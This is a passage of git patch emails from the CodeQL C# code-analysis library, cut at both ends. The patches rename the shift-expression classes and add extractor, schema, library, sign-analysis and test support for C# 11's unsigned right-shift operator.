LShiftExpr = LeftShiftExpr; predicate guardDirectlyControlsSsaRead = RU::guardControlsSsaRead/3; diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll index ce7637ccd92..0f1dcdb7673 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll @@ -391,19 +391,25 @@ module ExprNode { } /** A left-shift operation. */ - class LShiftExpr extends BinaryOperation { - override CS::LShiftExpr e; + class LeftShiftExpr extends BinaryOperation { + override CS::LeftShiftExpr e; override TLShiftOp getOp() { any() } } + /** DEPRECATED: Alias for LeftShiftExpr. */ + deprecated class LShiftExpr = LeftShiftExpr; + /** A right-shift operation. */ - class RShiftExpr extends BinaryOperation { - override CS::RShiftExpr e; + class RightShiftExpr extends BinaryOperation { + override CS::RightShiftExpr e; override TRShiftOp getOp() { any() } } + /** DEPRECATED: Alias for RightShiftExpr. */ + deprecated class RShiftExpr = RightShiftExpr; + /** A conditional expression. */ class ConditionalExpr extends ExprNode { override CS::ConditionalExpr e; diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll index 9102bf29131..ebff0c94e54 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll @@ -211,8 +211,8 @@ private module Impl { not e.getExpr() instanceof BitwiseAndExpr and not e.getExpr() instanceof BitwiseOrExpr and not e.getExpr() instanceof BitwiseXorExpr and - not e.getExpr() instanceof LShiftExpr and - not e.getExpr() instanceof RShiftExpr and + not e.getExpr() instanceof LeftShiftExpr and + not e.getExpr() instanceof RightShiftExpr and not e.getExpr() instanceof ConditionalExpr and not e.getExpr() instanceof RefExpr and not e.getExpr() instanceof LocalVariableDeclAndInitExpr and diff --git a/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll b/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll index a23da710465..23e02756ce2 100644 --- a/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll +++ b/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll @@ -31,7 +31,7 @@ class ComplementExpr extends UnaryBitwiseOperation, @bit_not_expr { * A binary bitwise operation. Either a bitwise-and operation * (`BitwiseAndExpr`), a bitwise-or operation (`BitwiseOrExpr`), * a bitwise exclusive-or operation (`BitwiseXorExpr`), a left-shift - * operation (`LShiftExpr`), or a right-shift operation (`RShiftExpr`). + * operation (`LeftShiftExpr`), or a right-shift operation (`RightShiftExpr`). */ class BinaryBitwiseOperation extends BitwiseOperation, BinaryOperation, @bin_bit_op_expr { override string getOperator() { none() } @@ -40,21 +40,27 @@ class BinaryBitwiseOperation extends BitwiseOperation, BinaryOperation, @bin_bit /** * A left-shift operation, for example `x << y`. */ -class LShiftExpr extends BinaryBitwiseOperation, @lshift_expr { +class LeftShiftExpr extends BinaryBitwiseOperation, @lshift_expr { override string getOperator() { result = "<<" } - override string getAPrimaryQlClass() { result = "LShiftExpr" } + override string getAPrimaryQlClass() { result = "LeftShiftExpr" } } +/** DEPRECATED: Alias for LeftShiftExpr. */ +deprecated class LShiftExpr = LeftShiftExpr; + /** * A right-shift operation, for example `x >> y`. */ -class RShiftExpr extends BinaryBitwiseOperation, @rshift_expr { +class RightShiftExpr extends BinaryBitwiseOperation, @rshift_expr { override string getOperator() { result = ">>" } - override string getAPrimaryQlClass() { result = "RShiftExpr" } + override string getAPrimaryQlClass() { result = "RightShiftExpr" } } +/** DEPRECATED: Alias for RightShiftExpr. */ +deprecated class RShiftExpr = RightShiftExpr; + /** * A bitwise-and operation, for example `x & y`. */ diff --git a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll index 7be1fa40ebb..56c2621afb9 100644 --- a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll @@ -1091,9 +1091,9 @@ class TranslatedCast extends TranslatedNonConstantExpr { } private Opcode binaryBitwiseOpcode(BinaryBitwiseOperation expr) { - expr instanceof LShiftExpr and result instanceof Opcode::ShiftLeft + expr instanceof LeftShiftExpr and result instanceof Opcode::ShiftLeft or - expr instanceof RShiftExpr and result instanceof Opcode::ShiftRight + expr instanceof RightShiftExpr and result instanceof Opcode::ShiftRight or expr instanceof BitwiseAndExpr and result instanceof Opcode::BitAnd or diff --git a/csharp/ql/test/library-tests/indexers/PrintAst.expected b/csharp/ql/test/library-tests/indexers/PrintAst.expected index cd97a04290a..36f15f11909 100644 --- a/csharp/ql/test/library-tests/indexers/PrintAst.expected +++ b/csharp/ql/test/library-tests/indexers/PrintAst.expected @@ -25,7 +25,7 @@ indexers.cs: # 18| -1: [TypeMention] Int32[] # 18| 1: [TypeMention] int # 18| 0: [AddExpr] ... + ... -# 18| 0: [RShiftExpr] ... >> ... +# 18| 0: [RightShiftExpr] ... >> ... # 18| 0: [SubExpr] ... - ... # 18| 0: [ParameterAccess] access to parameter length # 18| 1: [IntLiteral] 1 @@ -68,10 +68,10 @@ indexers.cs: # 32| 0: [BitwiseAndExpr] ... & ... # 32| 0: [ArrayAccess] access to array element # 32| -1: [FieldAccess] access to field bits -# 32| 0: [RShiftExpr] ... >> ... +# 32| 0: [RightShiftExpr] ... >> ... # 32| 0: [ParameterAccess] access to parameter index # 32| 1: [IntLiteral] 5 -# 32| 1: [LShiftExpr] ... << ... +# 32| 1: [LeftShiftExpr] ... << ... # 32| 0: [IntLiteral] 1 # 32| 1: [ParameterAccess] access to parameter index # 32| 1: [IntLiteral] 0 @@ -99,10 +99,10 @@ indexers.cs: # 42| 0: [AssignOrExpr] ... |= ... # 42| 0: [ArrayAccess] access to array element # 42| -1: [FieldAccess] access to field bits -# 42| 0: [RShiftExpr] ... >> ... +# 42| 0: [RightShiftExpr] ... >> ... # 42| 0: [ParameterAccess] access to parameter index # 42| 1: [IntLiteral] 5 -# 42| 1: [LShiftExpr] ... << ... +# 42| 1: [LeftShiftExpr] ... << ... # 42| 0: [IntLiteral] 1 # 42| 1: [ParameterAccess] access to parameter index # 45| 2: [BlockStmt] {...} @@ -110,11 +110,11 @@ indexers.cs: # 46| 0: [AssignAndExpr] ... &= ... # 46| 0: [ArrayAccess] access to array element # 46| -1: [FieldAccess] access to field bits -# 46| 0: [RShiftExpr] ... >> ... +# 46| 0: [RightShiftExpr] ... >> ... # 46| 0: [ParameterAccess] access to parameter index # 46| 1: [IntLiteral] 5 # 46| 1: [ComplementExpr] ~... -# 46| 0: [LShiftExpr] ... << ... +# 46| 0: [LeftShiftExpr] ... << ... # 46| 0: [IntLiteral] 1 # 46| 1: [ParameterAccess] access to parameter index # 53| 2: [Class] CountPrimes From 902b0a60d086b100263ee4e105a16821201b602a Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 11:16:17 +0100 Subject: [PATCH 220/381] C#: Fixup ShiftExpr rename. --- .../internal/rangeanalysis/ModulusAnalysisSpecific.qll | 3 --- .../csharp/dataflow/internal/rangeanalysis/RangeUtils.qll | 6 ------ 2 files changed, 9 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll index 3b7e29888d2..4a9c3cdbe6d 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll @@ -32,9 +32,6 @@ module Private { class LeftShiftExpr = RU::ExprNode::LeftShiftExpr; - /** DEPRECATED: Alias for LeftShiftExpr. */ - deprecated class LShiftExpr = LeftShiftExpr; - predicate guardDirectlyControlsSsaRead = RU::guardControlsSsaRead/3; predicate guardControlsSsaRead = RU::guardControlsSsaRead/3; diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll index 0f1dcdb7673..4b2894721b5 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll @@ -397,9 +397,6 @@ module ExprNode { override TLShiftOp getOp() { any() } } - /** DEPRECATED: Alias for LeftShiftExpr. */ - deprecated class LShiftExpr = LeftShiftExpr; - /** A right-shift operation. */ class RightShiftExpr extends BinaryOperation { override CS::RightShiftExpr e; @@ -407,9 +404,6 @@ module ExprNode { override TRShiftOp getOp() { any() } } - /** DEPRECATED: Alias for RightShiftExpr. */ - deprecated class RShiftExpr = RightShiftExpr; - /** A conditional expression. */ class ConditionalExpr extends ExprNode { override CS::ConditionalExpr e; From 14c92e6eb34b4a71d0ba55ac744b7730fd8a51c0 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 16:16:15 +0100 Subject: [PATCH 221/381] C#: Add expressions kind including dummy stats for unsigned right shift and unsigned right shift assigment. --- .../extractor/Semmle.Extraction.CSharp/Kinds/ExprKind.cs | 2 ++ csharp/ql/lib/semmlecode.csharp.dbscheme | 6 ++++-- csharp/ql/lib/semmlecode.csharp.dbscheme.stats | 8 ++++++++ 3 files changed, 14 insertions(+), 2 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Kinds/ExprKind.cs b/csharp/extractor/Semmle.Extraction.CSharp/Kinds/ExprKind.cs index a56ccf4c746..ef0b9412ef4 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Kinds/ExprKind.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Kinds/ExprKind.cs @@ -127,6 +127,8 @@ namespace Semmle.Extraction.Kinds WITH = 130, LIST_PATTERN = 131, SLICE_PATTERN = 132, + URSHIFT = 133, + ASSIGN_URSHIFT = 134, DEFINE_SYMBOL = 999, } } diff --git a/csharp/ql/lib/semmlecode.csharp.dbscheme b/csharp/ql/lib/semmlecode.csharp.dbscheme index 83aca6b3e4f..d0fba103f7d 100644 --- a/csharp/ql/lib/semmlecode.csharp.dbscheme +++ b/csharp/ql/lib/semmlecode.csharp.dbscheme @@ -1137,6 +1137,8 @@ case @expr.kind of /* C# 11.0 */ | 131 = @list_pattern_expr | 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr /* Preprocessor */ | 999 = @define_symbol_expr ; @@ -1160,7 +1162,7 @@ case @expr.kind of @assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_rem_expr @assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr - | @assign_lshift_expr | @assign_rshift_expr; + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; @member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; @@ -1191,7 +1193,7 @@ case @expr.kind of @log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; @bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr - | @rshift_expr; + | @rshift_expr | @urshift_expr; @un_bit_op_expr = @bit_not_expr; @bit_expr = @un_bit_op_expr | @bin_bit_op_expr; diff --git a/csharp/ql/lib/semmlecode.csharp.dbscheme.stats b/csharp/ql/lib/semmlecode.csharp.dbscheme.stats index 04516487ee9..8204b7b9aaa 100644 --- a/csharp/ql/lib/semmlecode.csharp.dbscheme.stats +++ b/csharp/ql/lib/semmlecode.csharp.dbscheme.stats @@ -644,6 +644,10 @@ @rshift_expr 5127     + + @urshift_expr + 0 + @lt_expr 34251 @@ -836,6 +840,10 @@ @assign_rshift_expr 455 + + @assign_urshift_expr + 0 + @par_expr 0 From 99b7bc3b73bb9768a09a3a47bce0a558bc270406 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 16:18:00 +0100 Subject: [PATCH 222/381] C#: Implement extractor support for unsigned right shift. --- .../Semmle.Extraction.CSharp/Entities/Expression.cs | 2 +- .../Entities/Expressions/Assignment.cs | 4 ++++ .../Entities/Expressions/Binary.cs | 1 + .../Entities/Expressions/Factory.cs | 2 ++ .../Entities/UserOperator.cs | 12 +++++++----- 5 files changed, 15 insertions(+), 6 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expression.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expression.cs index 6e0380da693..3984e7c00cf 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expression.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expression.cs @@ -240,7 +240,7 @@ namespace Semmle.Extraction.CSharp.Entities var callType = GetCallType(Context, node); if (callType == CallType.Dynamic) { - UserOperator.OperatorSymbol(method.Name, out var operatorName); + UserOperator.TryGetOperatorSymbol(method.Name, out var operatorName); trapFile.dynamic_member_name(this, operatorName); return; } diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Assignment.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Assignment.cs index 553d6d8349a..cbd7afbc9fa 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Assignment.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Assignment.cs @@ -71,6 +71,8 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions return ExprKind.ASSIGN_LSHIFT; case SyntaxKind.GreaterThanGreaterThanEqualsToken: return ExprKind.ASSIGN_RSHIFT; + case SyntaxKind.GreaterThanGreaterThanGreaterThanEqualsToken: + return ExprKind.ASSIGN_URSHIFT; case SyntaxKind.QuestionQuestionEqualsToken: return ExprKind.ASSIGN_COALESCE; default: @@ -141,6 +143,8 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions return ExprKind.REM; case ExprKind.ASSIGN_RSHIFT: return ExprKind.RSHIFT; + case ExprKind.ASSIGN_URSHIFT: + return ExprKind.URSHIFT; case ExprKind.ASSIGN_SUB: return ExprKind.SUB; case ExprKind.ASSIGN_XOR: diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Binary.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Binary.cs index 5153c856a25..45d43ac94c0 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Binary.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Binary.cs @@ -50,6 +50,7 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions case SyntaxKind.BarBarToken: return ExprKind.LOG_OR; case SyntaxKind.GreaterThanEqualsToken: return ExprKind.GE; case SyntaxKind.GreaterThanGreaterThanToken: return ExprKind.RSHIFT; + case SyntaxKind.GreaterThanGreaterThanGreaterThanToken: return ExprKind.URSHIFT; case SyntaxKind.LessThanLessThanToken: return ExprKind.LSHIFT; case SyntaxKind.CaretToken: return ExprKind.BIT_XOR; case SyntaxKind.QuestionQuestionToken: return ExprKind.NULL_COALESCING; diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Factory.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Factory.cs index a92715c4e1c..57e9dd47ef3 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Factory.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Factory.cs @@ -38,6 +38,7 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions case SyntaxKind.IsExpression: case SyntaxKind.AsExpression: case SyntaxKind.RightShiftExpression: + case SyntaxKind.UnsignedRightShiftExpression: case SyntaxKind.LeftShiftExpression: case SyntaxKind.ExclusiveOrExpression: case SyntaxKind.CoalesceExpression: @@ -76,6 +77,7 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions case SyntaxKind.ExclusiveOrAssignmentExpression: case SyntaxKind.LeftShiftAssignmentExpression: case SyntaxKind.RightShiftAssignmentExpression: + case SyntaxKind.UnsignedRightShiftAssignmentExpression: case SyntaxKind.DivideAssignmentExpression: case SyntaxKind.ModuloAssignmentExpression: case SyntaxKind.CoalesceAssignmentExpression: diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/UserOperator.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/UserOperator.cs index 536af5065ed..f478d991919 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/UserOperator.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/UserOperator.cs @@ -61,8 +61,7 @@ namespace Semmle.Extraction.CSharp.Entities containingType = Symbol.ContainingType; if (containingType is not null) { - var containingNamedType = containingType as INamedTypeSymbol; - return containingNamedType is null || + return containingType is not INamedTypeSymbol containingNamedType || !containingNamedType.GetMembers(Symbol.Name).Contains(Symbol); } @@ -83,7 +82,7 @@ namespace Semmle.Extraction.CSharp.Entities /// /// The method name. /// The converted operator name. - public static bool OperatorSymbol(string methodName, out string operatorName) + public static bool TryGetOperatorSymbol(string methodName, out string operatorName) { var success = true; switch (methodName) @@ -147,6 +146,9 @@ namespace Semmle.Extraction.CSharp.Entities case "op_RightShift": operatorName = ">>"; break; + case "op_UnsignedRightShift": + operatorName = ">>>"; + break; case "op_LeftShift": operatorName = "<<"; break; @@ -166,7 +168,7 @@ namespace Semmle.Extraction.CSharp.Entities var match = Regex.Match(methodName, "^op_Checked(.*)$"); if (match.Success) { - OperatorSymbol("op_" + match.Groups[1], out var uncheckedName); + TryGetOperatorSymbol("op_" + match.Groups[1], out var uncheckedName); operatorName = "checked " + uncheckedName; break; } @@ -190,7 +192,7 @@ namespace Semmle.Extraction.CSharp.Entities return OperatorSymbol(cx, method.ExplicitInterfaceImplementations.First()); var methodName = method.Name; - if (!OperatorSymbol(methodName, out var result)) + if (!TryGetOperatorSymbol(methodName, out var result)) cx.ModelError(method, $"Unhandled operator name in OperatorSymbol(): '{methodName}'"); return result; } From 9eb793377803810209ca2d80fb57f61a20e74606 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 16:18:33 +0100 Subject: [PATCH 223/381] C#: Implement library support for unsigned right shift. --- .../ql/lib/semmle/code/csharp/exprs/Assignment.qll | 12 +++++++++++- .../semmle/code/csharp/exprs/BitwiseOperation.qll | 12 +++++++++++- 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll b/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll index ce5022c5f89..14da6da266f 100644 --- a/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll +++ b/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll @@ -151,7 +151,8 @@ class AssignRemExpr extends AssignArithmeticOperation, @assign_rem_expr { * operation (`AssignOrExpr`), a bitwise exclusive-or assignment * operation (`AssignXorExpr`), a left-shift assignment * operation (`AssignLeftShiftExpr`), or a right-shift assignment - * operation (`AssignRightShiftExpr`). + * operation (`AssignRightShiftExpr`), or an unsigned right-shift assignment + * operation (`AssignUnsignedRightShiftExpr`). */ class AssignBitwiseOperation extends AssignOperation, @assign_bitwise_expr { } @@ -206,6 +207,15 @@ class AssignRightShiftExpr extends AssignBitwiseOperation, @assign_rshift_expr { /** DEPRECATED: Alias for AssignRightShiftExpr. */ deprecated class AssignRShiftExpr = AssignRightShiftExpr; +/** + * An unsigned right-shift assignment operation, for example `x >>>= y`. + */ +class AssignUnsighedRightShiftExpr extends AssignBitwiseOperation, @assign_urshift_expr { + override string getOperator() { result = ">>>=" } + + override string getAPrimaryQlClass() { result = "AssignUnsighedRightShiftExpr" } +} + /** * An event assignment. Either an event addition (`AddEventExpr`) or an event * removal (`RemoveEventExpr`). diff --git a/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll b/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll index 23e02756ce2..d32485a51f8 100644 --- a/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll +++ b/csharp/ql/lib/semmle/code/csharp/exprs/BitwiseOperation.qll @@ -31,7 +31,8 @@ class ComplementExpr extends UnaryBitwiseOperation, @bit_not_expr { * A binary bitwise operation. Either a bitwise-and operation * (`BitwiseAndExpr`), a bitwise-or operation (`BitwiseOrExpr`), * a bitwise exclusive-or operation (`BitwiseXorExpr`), a left-shift - * operation (`LeftShiftExpr`), or a right-shift operation (`RightShiftExpr`). + * operation (`LeftShiftExpr`), a right-shift operation (`RightShiftExpr`), + * or an unsigned right-shift operation (`UnsignedRightShiftExpr`). */ class BinaryBitwiseOperation extends BitwiseOperation, BinaryOperation, @bin_bit_op_expr { override string getOperator() { none() } @@ -61,6 +62,15 @@ class RightShiftExpr extends BinaryBitwiseOperation, @rshift_expr { /** DEPRECATED: Alias for RightShiftExpr. */ deprecated class RShiftExpr = RightShiftExpr; +/** + * An unsigned right-shift operation, for example `x >>> y`. + */ +class UnsignedRightShiftExpr extends BinaryBitwiseOperation, @urshift_expr { + override string getOperator() { result = ">>>" } + + override string getAPrimaryQlClass() { result = "UnsignedRightShiftExpr" } +} + /** * A bitwise-and operation, for example `x & y`. */ From d06a877709ec03ea3750bdd4ab69a5db9a79353a Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 16:21:36 +0100 Subject: [PATCH 224/381] C#: Introduce test cases and expected result for unsigned right shift. --- .../test/library-tests/csharp11/Operators.cs | 15 +++++++++++++ .../library-tests/csharp11/operators.expected | 6 ++++++ .../test/library-tests/csharp11/operators.ql | 21 +++++++++++++++++++ 3 files changed, 42 insertions(+) create mode 100644 csharp/ql/test/library-tests/csharp11/Operators.cs create mode 100644 csharp/ql/test/library-tests/csharp11/operators.expected create mode 100644 csharp/ql/test/library-tests/csharp11/operators.ql diff --git a/csharp/ql/test/library-tests/csharp11/Operators.cs b/csharp/ql/test/library-tests/csharp11/Operators.cs new file mode 100644 index 00000000000..9208654629b --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/Operators.cs @@ -0,0 +1,15 @@ + +public class MyClass +{ + public void M1() + { + var x1 = 1; + var x2 = x1 >>> 2; + + var y1 = -2; + var y2 = y1 >>> 3; + + var z = -4; + z >>>= 5; + } +} \ No newline at end of file diff --git a/csharp/ql/test/library-tests/csharp11/operators.expected b/csharp/ql/test/library-tests/csharp11/operators.expected new file mode 100644 index 00000000000..3b700fc2f4c --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/operators.expected @@ -0,0 +1,6 @@ +binarybitwise +| Operators.cs:7:18:7:25 | ... >>> ... | Operators.cs:7:18:7:19 | access to local variable x1 | Operators.cs:7:25:7:25 | 2 | >>> | UnsignedRightShiftExpr | +| Operators.cs:10:18:10:25 | ... >>> ... | Operators.cs:10:18:10:19 | access to local variable y1 | Operators.cs:10:25:10:25 | 3 | >>> | UnsignedRightShiftExpr | +| Operators.cs:13:9:13:16 | ... >>> ... | Operators.cs:13:9:13:9 | access to local variable z | Operators.cs:13:16:13:16 | 5 | >>> | UnsignedRightShiftExpr | +assignbitwise +| Operators.cs:13:9:13:16 | ... >>>= ... | Operators.cs:13:9:13:9 | access to local variable z | Operators.cs:13:16:13:16 | 5 | >>>= | AssignUnsighedRightShiftExpr | diff --git a/csharp/ql/test/library-tests/csharp11/operators.ql b/csharp/ql/test/library-tests/csharp11/operators.ql new file mode 100644 index 00000000000..f70897e8da5 --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/operators.ql @@ -0,0 +1,21 @@ +import csharp + +query predicate binarybitwise( + BinaryBitwiseOperation op, Expr left, Expr right, string name, string qlclass +) { + op.getFile().getStem() = "Operators" and + left = op.getLeftOperand() and + right = op.getRightOperand() and + name = op.getOperator() and + qlclass = op.getAPrimaryQlClass() +} + +query predicate assignbitwise( + AssignBitwiseOperation op, Expr left, Expr right, string name, string qlclass +) { + op.getFile().getStem() = "Operators" and + left = op.getLValue() and + right = op.getRValue() and + name = op.getOperator() and + qlclass = op.getAPrimaryQlClass() +} From 2568318460b3a8da3a4f2d35ff45dfd124354766 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 10:39:02 +0100 Subject: [PATCH 225/381] C#: Sign analysis support for unsigned right shift. --- .../csharp/dataflow/internal/rangeanalysis/RangeUtils.qll | 7 +++++++ .../internal/rangeanalysis/SignAnalysisSpecific.qll | 1 + 2 files changed, 8 insertions(+) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll index 4b2894721b5..69054d88205 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll @@ -404,6 +404,13 @@ module ExprNode { override TRShiftOp getOp() { any() } } + /** An unsigned right-shift operation. */ + class UnsignedRightShiftExpr extends BinaryOperation { + override CS::UnsignedRightShiftExpr e; + + override TURShiftOp getOp() { any() } + } + /** A conditional expression. */ class ConditionalExpr extends ExprNode { override CS::ConditionalExpr e; diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll index ebff0c94e54..5b61ca54682 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll @@ -213,6 +213,7 @@ private module Impl { not e.getExpr() instanceof BitwiseXorExpr and not e.getExpr() instanceof LeftShiftExpr and not e.getExpr() instanceof RightShiftExpr and + not e.getExpr() instanceof UnsignedRightShiftExpr and not e.getExpr() instanceof ConditionalExpr and not e.getExpr() instanceof RefExpr and not e.getExpr() instanceof LocalVariableDeclAndInitExpr and From 0f032c5be991b92782caf59d9c67e292ab30da66 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 13:06:19 +0100 Subject: [PATCH 226/381] C#: Sign analysis testcase for unsigned right shift. --- .../library-tests/csharp11/SignAnalysis.cs | 42 +++++++++++++++++++ .../csharp11/signAnalysis.expected | 7 ++++ .../library-tests/csharp11/signAnalysis.ql | 9 ++++ 3 files changed, 58 insertions(+) create mode 100644 csharp/ql/test/library-tests/csharp11/SignAnalysis.cs create mode 100644 csharp/ql/test/library-tests/csharp11/signAnalysis.expected create mode 100644 csharp/ql/test/library-tests/csharp11/signAnalysis.ql diff --git a/csharp/ql/test/library-tests/csharp11/SignAnalysis.cs b/csharp/ql/test/library-tests/csharp11/SignAnalysis.cs new file mode 100644 index 00000000000..09e7ceb9fdc --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/SignAnalysis.cs @@ -0,0 +1,42 @@ +public class MySignAnalysis +{ + + public void UnsignedRightShiftSign(int x, int y) + { + int z; + if (x == 0) + { + z = x >>> y; + } + + if (y == 0) + { + z = x >>> y; + } + + if (x > 0 && y == 0) + { + z = x >>> y; + } + + if (x > 0 && y > 0) + { + z = x >>> y; + } + + if (x > 0 && y < 0) + { + z = x >>> y; + } + + if (x < 0 && y > 0) + { + z = x >>> y; + } + + if (x < 0 && y < 0) + { + z = x >>> y; + } + } +} \ No newline at end of file diff --git a/csharp/ql/test/library-tests/csharp11/signAnalysis.expected b/csharp/ql/test/library-tests/csharp11/signAnalysis.expected new file mode 100644 index 00000000000..952719939ad --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/signAnalysis.expected @@ -0,0 +1,7 @@ +| SignAnalysis.cs:9:17:9:23 | ... >>> ... | 0 | +| SignAnalysis.cs:14:17:14:23 | ... >>> ... | + - 0 | +| SignAnalysis.cs:19:17:19:23 | ... >>> ... | + | +| SignAnalysis.cs:24:17:24:23 | ... >>> ... | + 0 | +| SignAnalysis.cs:29:17:29:23 | ... >>> ... | + 0 | +| SignAnalysis.cs:34:17:34:23 | ... >>> ... | + - | +| SignAnalysis.cs:39:17:39:23 | ... >>> ... | + - | diff --git a/csharp/ql/test/library-tests/csharp11/signAnalysis.ql b/csharp/ql/test/library-tests/csharp11/signAnalysis.ql new file mode 100644 index 00000000000..2aeb57e29fb --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/signAnalysis.ql @@ -0,0 +1,9 @@ +import csharp +import semmle.code.csharp.dataflow.internal.rangeanalysis.SignAnalysisCommon as Common + +from ControlFlow::Nodes::ExprNode e, Expr expr +where + e.getExpr() = expr and + expr.getFile().getStem() = "SignAnalysis" and + expr instanceof UnsignedRightShiftExpr +select e, strictconcat(string s | s = Common::exprSign(e).toString() | s, " ") From f74c7c28ae66c6d6f3d496989e10a2f75beda4cf Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 13:23:38 +0100 Subject: 